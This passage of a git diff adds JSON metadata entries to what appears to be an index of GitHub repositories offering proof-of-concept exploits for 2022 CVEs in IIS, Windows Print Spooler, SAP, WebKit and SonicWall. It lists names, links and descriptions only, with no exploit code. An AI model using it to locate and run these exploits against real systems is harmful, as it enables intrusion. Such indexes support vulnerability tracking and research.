"has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bluescreen", + "crash", + "cve", + "cve-2022-21907", + "denial-of-service", + "detection", + "dos", + "exploit", + "iis", + "metasploit", + "microsoft", + "nmap", + "payload", + "powershell", + "protection", + "python3", + "ruby", + "vulnerability", + "webserver" + ], + "visibility": "public", + "forks": 11, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 448729790, + "name": "CVE-2022-21907", + "full_name": "ZZ-SOCMAP\/CVE-2022-21907", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2022-21907", + "description": "HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907", + "fork": false, + "created_at": "2022-01-17T02:28:50Z", + "updated_at": "2024-11-02T16:24:21Z", + "pushed_at": "2022-01-20T02:07:59Z", + "stargazers_count": 361, + "watchers_count": 361, + "has_discussions": false, + "forks_count": 98, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 98, + "watchers": 361, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 448909871, + "name": "CVE-2022-21907", + "full_name": "xiska62314\/CVE-2022-21907", + "owner": { + "login": "xiska62314", + "id": 97891523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97891523?v=4", + "html_url": "https:\/\/github.com\/xiska62314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiska62314\/CVE-2022-21907", + "description": "CVE-2022-21907", + "fork": false, + "created_at": "2022-01-17T13:42:44Z", + "updated_at": "2022-01-17T13:42:44Z", + "pushed_at": "2022-01-17T13:42:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, { "id": 448952968, "name": "CVE-2022-21907-http.sys", @@ -68,6 +181,37 @@ "score": 0, "subscribers_count": 6 }, + { + "id": 451128086, + "name": "CVE-2022-21907-Vulnerability-PoC", + "full_name": "michelep\/CVE-2022-21907-Vulnerability-PoC", + "owner": { + "login": "michelep", + "id": 1425559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1425559?v=4", + "html_url": "https:\/\/github.com\/michelep", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michelep\/CVE-2022-21907-Vulnerability-PoC", + "description": "CVE-2022-21907 Vulnerability PoC", + "fork": false, + "created_at": "2022-01-23T14:25:12Z", + "updated_at": "2025-01-03T06:13:11Z", + "pushed_at": "2022-01-23T14:28:54Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 28, + "score": 0, + "subscribers_count": 2 + }, { "id": 477659433, "name": "CVE-2022-21907", @@ -198,5 +342,202 @@ "watchers": 1, "score": 0, "subscribers_count": 1 + }, + { + "id": 559316245, + "name": "CVE-2022-21907", + "full_name": "Malwareman007\/CVE-2022-21907", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-21907", + "description": "POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability.", + "fork": false, + "created_at": "2022-10-29T18:25:26Z", + "updated_at": "2024-08-04T15:19:31Z", + "pushed_at": "2024-08-04T15:19:55Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21907", + "exploit", + "http", + "http-protocol", + "poc", + "remote-code-execution", + "security", + "security-tools", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 4, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 569183785, + "name": "Home-Demolisher", + "full_name": "0xmaximus\/Home-Demolisher", + "owner": { + "login": "0xmaximus", + "id": 63053441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63053441?v=4", + "html_url": "https:\/\/github.com\/0xmaximus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmaximus\/Home-Demolisher", + "description": "PoC for CVE-2021-31166 and CVE-2022-21907", + "fork": false, + "created_at": "2022-11-22T09:10:36Z", + "updated_at": "2024-10-03T05:16:45Z", + "pushed_at": "2022-12-08T11:05:50Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 632224259, + "name": "CVE-2022-21907", + "full_name": "cassie0206\/CVE-2022-21907", + "owner": { + "login": "cassie0206", + "id": 90564331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90564331?v=4", + "html_url": "https:\/\/github.com\/cassie0206", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cassie0206\/CVE-2022-21907", + "description": "2022 Spring Prof. 謝續平", + "fork": false, + "created_at": "2023-04-25T01:13:51Z", + "updated_at": "2023-05-17T08:52:27Z", + "pushed_at": "2023-06-25T07:11:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637001964, + "name": "CVE-2022-21907-RCE", + "full_name": "EzoomE\/CVE-2022-21907-RCE", + "owner": { + "login": "EzoomE", + "id": 99851303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99851303?v=4", + "html_url": "https:\/\/github.com\/EzoomE", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EzoomE\/CVE-2022-21907-RCE", + "description": "CVE-2022-21907漏洞RCE PoC", + "fork": false, + "created_at": "2023-05-06T07:50:08Z", + "updated_at": "2023-05-06T07:50:53Z", + "pushed_at": "2023-05-22T03:14:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 679736679, + "name": "CVE-2022-21907", + "full_name": "asepsaepdin\/CVE-2022-21907", + "owner": { + "login": "asepsaepdin", + "id": 122620685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2022-21907", + "description": null, + "fork": false, + "created_at": "2023-08-17T13:58:00Z", + "updated_at": "2023-08-17T14:12:38Z", + "pushed_at": "2023-09-03T15:14:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729648780, + "name": "CVE-2022-21907", + "full_name": "kamal-marouane\/CVE-2022-21907", + "owner": { + "login": "kamal-marouane", + "id": 110986028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110986028?v=4", + "html_url": "https:\/\/github.com\/kamal-marouane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kamal-marouane\/CVE-2022-21907", + "description": "Vulnerability in HTTP Protocol Stack Enabling Remote Code Execution and Potential System Crash.", + "fork": false, + "created_at": "2023-12-09T22:26:49Z", + "updated_at": "2023-12-11T20:32:49Z", + "pushed_at": "2024-01-19T04:04:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-21970.json b/2022/CVE-2022-21970.json new file mode 100644 index 0000000000..c10bdc4601 --- /dev/null +++ b/2022/CVE-2022-21970.json @@ -0,0 +1,43 @@ +[ + { + "id": 555037494, + "name": "CVE-2022-21970", + "full_name": "Malwareman007\/CVE-2022-21970", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-21970", + "description": "POC OF CVE-2022-21970", + "fork": false, + "created_at": "2022-10-20T20:55:28Z", + "updated_at": "2023-12-11T12:51:40Z", + "pushed_at": "2022-10-20T21:02:17Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chromium", + "cve-2022-21970", + "javascript", + "malware", + "microsoft", + "microsoft-edge", + "privelage-escalation", + "security", + "vulnerabilities" + ], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21971.json b/2022/CVE-2022-21971.json index 9ebf551d89..19855fb16f 100644 --- a/2022/CVE-2022-21971.json +++ b/2022/CVE-2022-21971.json @@ -1,4 +1,42 @@ [ + { + "id": 463960612, + "name": "CVE-2022-21971", + "full_name": "0vercl0k\/CVE-2022-21971", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2022-21971", + "description": "PoC for CVE-2022-21971 \"Windows Runtime Remote Code Execution Vulnerability\"", + "fork": false, + "created_at": "2022-02-26T20:37:42Z", + "updated_at": "2024-11-15T16:45:11Z", + "pushed_at": "2022-02-26T20:45:19Z", + "stargazers_count": 307, + "watchers_count": 307, + "has_discussions": false, + "forks_count": 64, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "com", + "cve-2022-21971", + "memory-corruption", + "office", + "oleload", + "rtf" + ], + "visibility": "public", + "forks": 64, + "watchers": 307, + "score": 0, + "subscribers_count": 10 + }, { "id": 481903403, "name": "CVE-2022-21971-Windows-Runtime-RCE", @@ -29,5 +67,44 @@ "watchers": 2, "score": 0, "subscribers_count": 1 + }, + { + "id": 547436435, + "name": "CVE-2022-21971", + "full_name": "Malwareman007\/CVE-2022-21971", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-21971", + "description": "POC Of CVE-2022-21971 ", + "fork": false, + "created_at": "2022-10-07T17:25:03Z", + "updated_at": "2023-05-06T12:15:03Z", + "pushed_at": "2022-10-07T17:27:56Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-21971", + "microsoftword", + "pointer", + "prauthproviders", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 11, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-21974.json b/2022/CVE-2022-21974.json new file mode 100644 index 0000000000..c915667a71 --- /dev/null +++ b/2022/CVE-2022-21974.json @@ -0,0 +1,41 @@ +[ + { + "id": 463939926, + "name": "CVE-2022-21974", + "full_name": "0vercl0k\/CVE-2022-21974", + "owner": { + "login": "0vercl0k", + "id": 1476421, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4", + "html_url": "https:\/\/github.com\/0vercl0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2022-21974", + "description": "PoC for CVE-2022-21974 \"Roaming Security Rights Management Services Remote Code Execution Vulnerability\"", + "fork": false, + "created_at": "2022-02-26T18:53:56Z", + "updated_at": "2024-11-15T16:45:13Z", + "pushed_at": "2022-02-26T19:12:12Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "com", + "cve-2022-21974", + "memory-corruption", + "office", + "oleload", + "rtf", + "wordpad" + ], + "visibility": "public", + "forks": 12, + "watchers": 59, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-21999.json b/2022/CVE-2022-21999.json new file mode 100644 index 0000000000..a4ed0ecba1 --- /dev/null +++ b/2022/CVE-2022-21999.json @@ -0,0 +1,36 @@ +[ + { + "id": 457033886, + "name": "SpoolFool", + "full_name": "ly4k\/SpoolFool", + "owner": { + "login": "ly4k", + "id": 53348818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4", + "html_url": "https:\/\/github.com\/ly4k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly4k\/SpoolFool", + "description": "Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)", + "fork": false, + "created_at": "2022-02-08T17:25:44Z", + "updated_at": "2025-01-06T20:22:58Z", + "pushed_at": "2022-02-09T16:54:09Z", + "stargazers_count": 778, + "watchers_count": 778, + "has_discussions": false, + "forks_count": 159, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-21999", + "cve-2022-22718" + ], + "visibility": "public", + "forks": 159, + "watchers": 778, + "score": 0, + "subscribers_count": 15 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22029.json b/2022/CVE-2022-22029.json new file mode 100644 index 0000000000..a5d70b5ae0 --- /dev/null +++ b/2022/CVE-2022-22029.json @@ -0,0 +1,33 @@ +[ + { + "id": 515059719, + "name": "CVE-2022-22029-NFS-Server-", + "full_name": "mchoudhary15\/CVE-2022-22029-NFS-Server-", + "owner": { + "login": "mchoudhary15", + "id": 105639627, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105639627?v=4", + "html_url": "https:\/\/github.com\/mchoudhary15", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mchoudhary15\/CVE-2022-22029-NFS-Server-", + "description": null, + "fork": false, + "created_at": "2022-07-18T06:23:53Z", + "updated_at": "2024-08-12T20:25:11Z", + "pushed_at": "2022-07-18T06:28:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22057.json b/2022/CVE-2022-22057.json new file mode 100644 index 0000000000..f482758f0a --- /dev/null +++ b/2022/CVE-2022-22057.json @@ -0,0 +1,33 @@ +[ + { + "id": 664855267, + "name": "CVE-2022-22057_SM-F926U", + "full_name": "diabl0w\/CVE-2022-22057_SM-F926U", + "owner": { + "login": "diabl0w", + "id": 16129074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16129074?v=4", + "html_url": "https:\/\/github.com\/diabl0w", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diabl0w\/CVE-2022-22057_SM-F926U", + "description": null, + "fork": false, + "created_at": "2023-07-10T22:55:02Z", + "updated_at": "2024-07-14T09:49:07Z", + "pushed_at": "2023-07-11T23:15:53Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22063.json b/2022/CVE-2022-22063.json new file mode 100644 index 0000000000..45df48db22 --- /dev/null +++ b/2022/CVE-2022-22063.json @@ -0,0 +1,42 @@ +[ + { + "id": 582761070, + "name": "CVE-2022-22063", + "full_name": "msm8916-mainline\/CVE-2022-22063", + "owner": { + "login": "msm8916-mainline", + "id": 52102319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52102319?v=4", + "html_url": "https:\/\/github.com\/msm8916-mainline", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/msm8916-mainline\/CVE-2022-22063", + "description": "Security issue in the hypervisor firmware of some older Qualcomm chipsets", + "fork": false, + "created_at": "2022-12-27T19:48:30Z", + "updated_at": "2024-11-19T16:15:39Z", + "pushed_at": "2022-12-27T20:32:37Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": true, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "arm", + "cve", + "firmware", + "hypervisor", + "msm8916", + "qcom", + "qualcomm", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22274.json b/2022/CVE-2022-22274.json new file mode 100644 index 0000000000..4548adc86a --- /dev/null +++ b/2022/CVE-2022-22274.json @@ -0,0 +1,95 @@ +[ + { + "id": 588980352, + "name": "Sonic_CVE-2022-22274_poc", + "full_name": "4lucardSec\/Sonic_CVE-2022-22274_poc", + "owner": { + "login": "4lucardSec", + "id": 71567033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71567033?v=4", + "html_url": "https:\/\/github.com\/4lucardSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/4lucardSec\/Sonic_CVE-2022-22274_poc", + "description": null, + "fork": false, + "created_at": "2023-01-14T17:15:53Z", + "updated_at": "2024-01-22T02:42:51Z", + "pushed_at": "2023-01-14T17:18:51Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652282669, + "name": "CVE-2022-22274_poc", + "full_name": "forthisvideo\/CVE-2022-22274_poc", + "owner": { + "login": "forthisvideo", + "id": 136259454, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136259454?v=4", + "html_url": "https:\/\/github.com\/forthisvideo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forthisvideo\/CVE-2022-22274_poc", + "description": null, + "fork": false, + "created_at": "2023-06-11T16:56:53Z", + "updated_at": "2023-06-11T16:57:33Z", + "pushed_at": "2023-06-11T16:57:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742585090, + "name": "CVE-2022-22274_CVE-2023-0656", + "full_name": "BishopFox\/CVE-2022-22274_CVE-2023-0656", + "owner": { + "login": "BishopFox", + "id": 4523757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4", + "html_url": "https:\/\/github.com\/BishopFox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BishopFox\/CVE-2022-22274_CVE-2023-0656", + "description": null, + "fork": false, + "created_at": "2024-01-12T20:03:51Z", + "updated_at": "2024-11-28T00:21:37Z", + "pushed_at": "2024-01-12T20:15:47Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22296.json b/2022/CVE-2022-22296.json new file mode 100644 index 0000000000..09fd75a4a5 --- /dev/null +++ b/2022/CVE-2022-22296.json @@ -0,0 +1,33 @@ +[ + { + "id": 450430110, + "name": "CVE-2022-22296", + "full_name": "vlakhani28\/CVE-2022-22296", + "owner": { + "login": "vlakhani28", + "id": 42069316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42069316?v=4", + "html_url": "https:\/\/github.com\/vlakhani28", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vlakhani28\/CVE-2022-22296", + "description": "All Details about CVE-2022-22296", + "fork": false, + "created_at": "2022-01-21T09:29:21Z", + "updated_at": "2024-08-12T20:19:56Z", + "pushed_at": "2022-01-21T09:45:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22536.json b/2022/CVE-2022-22536.json new file mode 100644 index 0000000000..b862322abb --- /dev/null +++ b/2022/CVE-2022-22536.json @@ -0,0 +1,64 @@ +[ + { + "id": 459508869, + "name": "CVE-2022-22536", + "full_name": "ZZ-SOCMAP\/CVE-2022-22536", + "owner": { + "login": "ZZ-SOCMAP", + "id": 98105412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4", + "html_url": "https:\/\/github.com\/ZZ-SOCMAP", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2022-22536", + "description": "SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536.", + "fork": false, + "created_at": "2022-02-15T09:22:19Z", + "updated_at": "2024-09-19T01:53:19Z", + "pushed_at": "2022-02-21T08:58:22Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 50, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 477106089, + "name": "SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536", + "full_name": "tess-ss\/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536", + "owner": { + "login": "tess-ss", + "id": 65326024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65326024?v=4", + "html_url": "https:\/\/github.com\/tess-ss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tess-ss\/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536", + "description": null, + "fork": false, + "created_at": "2022-04-02T16:12:56Z", + "updated_at": "2024-05-28T15:57:46Z", + "pushed_at": "2022-04-02T16:57:00Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22555.json b/2022/CVE-2022-22555.json new file mode 100644 index 0000000000..9d9daec40f --- /dev/null +++ b/2022/CVE-2022-22555.json @@ -0,0 +1,33 @@ +[ + { + "id": 758383136, + "name": "cve-2022-22555", + "full_name": "colaoo123\/cve-2022-22555", + "owner": { + "login": "colaoo123", + "id": 136353760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136353760?v=4", + "html_url": "https:\/\/github.com\/colaoo123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/colaoo123\/cve-2022-22555", + "description": null, + "fork": false, + "created_at": "2024-02-16T07:45:51Z", + "updated_at": "2024-02-16T07:50:14Z", + "pushed_at": "2024-02-16T07:50:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22582.json b/2022/CVE-2022-22582.json new file mode 100644 index 0000000000..74252905a0 --- /dev/null +++ b/2022/CVE-2022-22582.json @@ -0,0 +1,33 @@ +[ + { + "id": 470942701, + "name": "CVE-2022-22582", + "full_name": "poizon-box\/CVE-2022-22582", + "owner": { + "login": "poizon-box", + "id": 62810532, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62810532?v=4", + "html_url": "https:\/\/github.com\/poizon-box", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/poizon-box\/CVE-2022-22582", + "description": "exploits XAR – Arbitrary File Write", + "fork": false, + "created_at": "2022-03-17T10:16:27Z", + "updated_at": "2022-03-17T10:17:09Z", + "pushed_at": "2022-03-17T10:17:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22600.json b/2022/CVE-2022-22600.json new file mode 100644 index 0000000000..b3c05da0ce --- /dev/null +++ b/2022/CVE-2022-22600.json @@ -0,0 +1,33 @@ +[ + { + "id": 471589175, + "name": "MSF-screenrecord-on-MacOS", + "full_name": "KlinKlinKlin\/MSF-screenrecord-on-MacOS", + "owner": { + "login": "KlinKlinKlin", + "id": 45547668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45547668?v=4", + "html_url": "https:\/\/github.com\/KlinKlinKlin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KlinKlinKlin\/MSF-screenrecord-on-MacOS", + "description": "CVE-2022-22600 Proof of Concept", + "fork": false, + "created_at": "2022-03-19T04:13:52Z", + "updated_at": "2024-10-03T01:12:28Z", + "pushed_at": "2022-03-19T02:46:12Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-22620.json b/2022/CVE-2022-22620.json index e68b0fc300..a4ac95cbb0 100644 --- a/2022/CVE-2022-22620.json +++ b/2022/CVE-2022-22620.json @@ -29,5 +29,67 @@ "watchers": 3, "score": 0, "subscribers_count": 2 + }, + { + "id": 521162126, + "name": "CVE-2022-22620", + "full_name": "springsec\/CVE-2022-22620", + "owner": { + "login": "springsec", + "id": 44409706, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44409706?v=4", + "html_url": "https:\/\/github.com\/springsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/springsec\/CVE-2022-22620", + "description": "Webkit (Safari) - Exploit", + "fork": false, + "created_at": "2022-08-04T07:11:39Z", + "updated_at": "2024-08-25T14:05:16Z", + "pushed_at": "2022-08-09T13:43:27Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 627211251, + "name": "dkjiayu.github.io", + "full_name": "bb33bb\/dkjiayu.github.io", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/dkjiayu.github.io", + "description": "POC for cve-2022-22620", + "fork": false, + "created_at": "2023-04-13T02:20:40Z", + "updated_at": "2023-04-13T02:20:37Z", + "pushed_at": "2023-01-08T05:31:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 } ] \ No newline at end of file diff --git a/2022/CVE-2022-22629.json b/2022/CVE-2022-22629.json new file mode 100644 index 0000000000..8291bdeb0b --- /dev/null +++ b/2022/CVE-2022-22629.json @@ -0,0 +1,33 @@ +[ + { + "id": 534900277, + "name": "CVE-2022-22629", + "full_name": "lck0\/CVE-2022-22629", + "owner": { + "login": "lck0", + "id": 78191870, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78191870?v=4", + "html_url": "https:\/\/github.com\/lck0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lck0\/CVE-2022-22629", + "description": "CVE-2022-22629 Proof of Concept", + "fork": false, + "created_at": "2022-09-10T05:22:15Z", + "updated_at": "2022-09-10T05:21:59Z", + "pushed_at": "2022-09-09T21:23:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + 